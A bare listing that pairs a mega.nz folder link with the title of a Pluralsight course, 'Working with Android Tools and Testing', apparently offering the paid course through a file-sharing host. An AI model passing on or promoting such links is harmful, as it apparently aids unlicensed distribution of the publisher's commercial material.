https://mega.nz/#F!ptxVQRzZ!N4jRKcMHP9_ScG5l9vE3uQ
Pluralsight
Working with Android Tools and Testing